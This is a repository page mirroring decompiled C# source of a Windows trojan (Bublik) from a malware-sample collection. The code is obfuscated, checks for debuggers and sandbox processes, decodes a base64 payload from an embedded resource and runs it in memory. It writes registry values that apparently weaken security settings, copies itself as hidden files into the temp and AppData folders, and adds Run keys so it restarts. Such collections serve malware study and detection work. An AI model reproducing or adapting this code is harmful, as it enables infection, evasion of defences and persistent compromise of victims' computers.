ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-20 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
9432413cf6
MalwareSourceCode/MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7/_0002.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

458 lines
14 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: 
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Windows.Forms;
internal sealed class \u0002
{
private static \u0003 \u0002 = new \u0003();
private static string \u0003 = \u0008.\u0002(-665676900);
private static string \u0005 = \u0008.\u0002(-665676900);
private static byte[] \u0008 = new byte[7]
{
(byte) 98,
(byte) 87,
(byte) 76,
(byte) 65,
(byte) 54,
(byte) 43,
(byte) 32
};
private static byte[] \u0006;
private static bool \u000E = false;
private static bool \u000F = false;
private static bool \u0002\u2000 = true;
private static bool \u0003\u2000 = false;
private static bool \u0005\u2000 = false;
private static bool \u0008\u2000 = false;
private static bool \u0006\u2000 = false;
private static bool \u000E\u2000 = true;
private static bool \u000F\u2000 = false;
private static bool \u0002\u2001 = false;
private static bool \u0003\u2001 = true;
private static bool \u0005\u2001 = false;
private static bool \u0008\u2001 = false;
private static bool \u0006\u2001 = false;
private static bool \u000E\u2001 = false;
private static bool \u000F\u2001 = false;
private static string \u0002\u2002 = \u0008.\u0002(-665676875);
private static string \u0003\u2002 = \u0008.\u0002(-665676839);
private static bool \u0005\u2002 = false;
private static bool \u0008\u2002 = false;
private static bool \u0006\u2002 = false;
private static bool \u000E\u2002 = false;
private static bool \u000F\u2002 = false;
private static bool \u0002\u2003 = true;
private static string \u0003\u2003 = \u0008.\u0002(-665676861);
private static bool \u0005\u2003 = false;
private static bool \u0008\u2003 = false;
private static int \u0006\u2003 = 0;
private static ThreadStart \u000E\u2003;
private static bool \u0002(string _param0) => Process.GetProcessesByName(_param0).Length > 0;
private static void \u0002(string _param0, string _param1)
{
int num = (int) MessageBox.Show(_param0, _param1, MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
private static void \u0002() => Console.Write(\u0008.\u0002(-665677671));
private static void \u0002(string[] _param0)
{
if (!(\u0002.\u0003 == \u0002.\u0005))
return;
\u0002.\u0002();
if (\u0002.\u000F\u2001)
{
try
{
if (\u0002.\u000E\u2003 == null)
\u0002.\u000E\u2003 = new ThreadStart(\u0002.\u0005);
new Thread(\u0002.\u000E\u2003).Start();
}
catch
{
}
}
\u0002.\u0002();
if (\u0002.\u000E)
{
try
{
if (Debugger.IsAttached)
return;
}
catch
{
}
}
if (\u0002.\u000F)
{
try
{
long ticks = DateTime.Now.Ticks;
Thread.Sleep(10);
if (DateTime.Now.Ticks - ticks < 10L)
return;
}
catch
{
}
}
if (\u0002.\u0002\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677682)))
return;
}
catch
{
}
}
if (\u0002.\u0003\u2000)
{
try
{
Form form = new Form();
form.Text = \u0008.\u0002(-665677636);
form.Opacity = 0.0;
form.ShowInTaskbar = false;
form.Show();
if (form.Text == \u0008.\u0002(-665677647))
return;
form.Close();
}
catch
{
}
}
if (\u0002.\u0005\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677662)))
return;
}
catch
{
}
}
if (\u0002.\u0008\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677616)))
return;
}
catch
{
}
}
if (\u0002.\u0006\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677626)))
return;
}
catch
{
}
}
if (\u0002.\u000E\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677579)))
return;
}
catch
{
}
}
if (\u0002.\u000F\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677586)))
return;
}
catch
{
}
}
if (\u0002.\u0002\u2001)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677795)))
return;
}
catch
{
}
}
\u0002.\u0002();
if (\u0002.\u0008\u2003)
{
try
{
Thread.Sleep(\u0002.\u0006\u2003 * 1000);
}
catch
{
}
}
\u0002.\u0002();
try
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\u0008.\u0002(-665677805));
\u0002.\u0002();
StreamReader streamReader = new StreamReader(manifestResourceStream);
string end = streamReader.ReadToEnd();
\u0002.\u0002();
streamReader.Close();
\u0002.\u0006 = Convert.FromBase64String(end);
try
{
\u0002.\u0002();
Thread thread = new Thread(new ThreadStart(\u0002.\u0003));
\u0002.\u0002();
thread.Start();
\u0002.\u0002();
}
catch
{
}
}
catch
{
}
\u0002.\u0002();
if (\u0002.\u0005\u2002)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677820), true).SetValue(\u0008.\u0002(-665677754), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
}
catch
{
}
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
}
catch
{
}
if (\u0002.\u0008\u2002)
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677354));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354), true).SetValue(\u0008.\u0002(-665677343), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354), true).SetValue(\u0008.\u0002(-665677343), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
}
if (\u0002.\u0006\u2002)
{
try
{
new Process()
{
StartInfo = {
FileName = \u0008.\u0002(-665677560),
Arguments = \u0008.\u0002(-665677508),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
if (\u0002.\u000E\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677491), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677491), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
catch
{
}
}
if (\u0002.\u000F\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677458), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677458), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
catch
{
}
}
}
\u0002.\u0002();
if (\u0002.\u0002\u2003)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677820), true).SetValue(\u0008.\u0002(-665677163), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
}
catch
{
}
try
{
FileStream fileStream1 = new FileStream(Process.GetCurrentProcess().MainModule.FileName, FileMode.Open, FileAccess.Read);
byte[] buffer = new byte[fileStream1.Length];
fileStream1.Read(buffer, 0, buffer.Length);
fileStream1.Close();
FileStream fileStream2 = new FileStream(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileMode.Create);
fileStream2.Write(buffer, 0, buffer.Length);
fileStream2.Close();
fileStream2.Dispose();
FileStream fileStream3 = new FileStream(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileMode.Create);
fileStream3.Write(buffer, 0, buffer.Length);
fileStream3.Close();
fileStream3.Dispose();
File.SetAttributes(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileAttributes.Hidden);
File.SetAttributes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileAttributes.Hidden);
}
catch
{
}
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677131), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-665677131), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
}
catch
{
}
if (\u0002.\u0005\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677073));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
}
catch
{
}
}
}
\u0002.\u0002();
if (!\u0002.\u0005\u2003)
return;
try
{
if (Application.ExecutablePath.Contains(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176))))
return;
string str = \u0008.\u0002(-665677275) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u0008.\u0002(-665677226) + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u0008.\u0002(-665677247);
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677198));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677198)),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
public static void \u0003()
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[1]
{
(object) new string[0]
});
}
catch
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[0]);
}
catch
{
try
{
\u0002.\u0002();
MethodInfo entryPoint = Assembly.Load(\u0002.\u0006).EntryPoint;
\u0002.\u0002();
entryPoint.Invoke((object) null, (object[]) null);
}
catch
{
try
{
\u0002.\u0002();
\u0002.\u0002.\u0002(\u0002.\u0006, string.Empty, Application.ExecutablePath);
\u0002.\u0002();
}
catch
{
}
}
}
}
}
private static void \u0005() => \u0002.\u0002(\u0002.\u0002\u2002, \u0002.\u0003\u2002);
}
Reference in New Issue View Git Blame Copy Permalink